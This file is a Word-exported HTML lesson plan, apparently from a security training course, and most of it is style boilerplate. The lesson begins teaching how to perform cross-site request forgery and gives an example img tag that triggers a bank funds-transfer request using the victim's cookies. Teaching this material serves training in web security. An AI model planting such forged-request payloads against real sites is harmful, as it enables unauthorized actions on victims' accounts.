+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+h3
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 3 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:3;
+	font-size:13.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.Heading3Char
+	{mso-style-name:"Heading 3 Char";
+	mso-style-noshow:yes;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 3";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Times New Roman","serif";
+	mso-ascii-font-family:"Times New Roman";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Times New Roman";
+	mso-bidi-font-family:Arial;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform Cross Site Request Forgery. <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'>Concept
+/ Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>This
+lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><b><span style='font-family:"Arial","sans-serif"'>How
+the attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>Cross-Site
+Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a
+page that contains img links like the one below: <o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span lang=NL-BE
+style='font-family:"Arial","sans-serif";mso-ansi-language:NL-BE'>&lt;img
+src=&quot;</span><span style='font-family:"Arial","sans-serif"'><a
+href="http://www.mybank.com/transferFunds.do?acctId=123456"
+title="http://www.mybank.com/transferFunds.do?acctId=123456"><span lang=NL-BE
+style='mso-ansi-language:NL-BE'>http://www.mybank.com/sendFunds.do?acctId=123456</span></a></span><span
+lang=NL-BE style='font-family:"Arial","sans-serif";mso-ansi-language:NL-BE'>&quot;/&gt;</span><span
+lang=NL-BE style='font-size:10.0pt;font-family:"Arial","sans-serif";mso-ansi-language:
+NL-BE'><o:p></o:p></span></p>
+
+<p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'>When
+the victim's browser attempts to render this page, it will issue a request to
+www.mybank.com to the transferFunds.do page with the specified parameters. The
+browser will think the link is to get an image, even though it actually is a
+funds transfer function. The request will include any cookies associated with
+the site. Therefore, if the user has authenticated to the site, and has either
+a permanent cookie or even a current session cookie, the site will have no way
+to distinguish this from a legitimate user request. In this way, the attacker
+can make the victim perform actions that they didn't intend to, such as logout,
+purchase item, or any other function provided by the vulnerable website <o:p></o:p></span></p>
+
